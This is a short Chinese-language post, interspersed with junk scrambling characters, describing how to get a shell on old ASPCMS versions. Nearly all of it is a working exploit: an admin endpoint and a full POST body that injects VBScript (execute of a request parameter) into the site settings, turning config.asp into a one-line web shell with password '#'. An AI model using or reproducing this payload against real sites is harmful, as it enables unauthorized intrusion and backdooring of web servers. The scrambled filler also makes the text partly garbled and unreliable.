老的ASPCMS版本的秒杀拿SHELL漏洞' @, O6 E5 B1 }( L \! ]
) L6 t, n9 Q% J+ a3 P. b6 { 找到后台。。。然后
+ z8 w% y: `; m- Y; T3 u9 `& z6 ~ / w0 g, o$ F( d" j5 T( W$ c0 o
/admin/_system/AspCms_SiteSetting.asp?action=saves
0 k) C0 {, c6 J5 W6 r
. X' a! v& W" U8 h8 l) k* D0 a直接POST
d, D2 o9 A v1 p- h1 n2 w
) A+ {6 {* s3 E$ Q+ q: Q9 `runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
1 r2 z- Y5 {7 _4 X5 ~3 r# [6 J
& R, J5 w! w0 }, b再连接配置文件config.asp 密码为#
- `0 ~* e% S; w" z4 R |